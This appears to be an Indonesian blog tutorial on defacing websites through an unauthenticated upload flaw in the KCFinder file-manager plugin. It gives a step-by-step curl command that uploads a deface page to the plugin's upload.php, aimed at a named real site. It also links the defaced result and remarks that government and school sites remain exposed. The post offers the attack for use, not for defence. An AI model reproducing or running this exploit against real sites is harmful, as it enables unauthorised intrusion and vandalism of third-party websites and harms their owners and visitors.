Lompat ke konten Lompat ke sidebar Lompat ke footer
Tutorial Deface POC KCFinder di Terminal dengan cURL

Tutorial Deface POC KCFinder di Terminal dengan cURL

Baik rekan rekan yang berbahagia pada kesempatan ini admin akan membagikan tentang Tutorial Deface POC KCFinder di Terminal dengan cURL yang semoga dapat menjawab kebingungan anda seputar deface POC KCFinder. Berikut pengertian dan penjelasan tentang deface POC KCFinder di terminal.

Tutorial Deface POC KCFinder di Terminal dengan cURL

 KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.


cURL adalah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data menggunakan berbagai protokol.


Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.

Oke langsung aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu bahan yang diperlukan,

Bahan :
  • Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
  • Terminal / CMD 
Tested :
  • MAC OS X Yosemite
Langkah :
  1. Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
  2. lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini target saya sudah ada seperti berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
    Tutorial Deface POC KCFinder di Terminal dengan cURL
  3. Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ setelah /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.

Hasil : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml


Demikianlah artikel tentang KCFinder Upload Script Deface di Terminal dengan cURL yang semoga bermanfaat untuk rekan rekan yang mau belajar terkait KCFinder ini. dan jika ada pertanyaan silahkan komentar pada kolom di bawah dengan registrasi free di discus melalui email dan verifikasi email anda.
Open Comments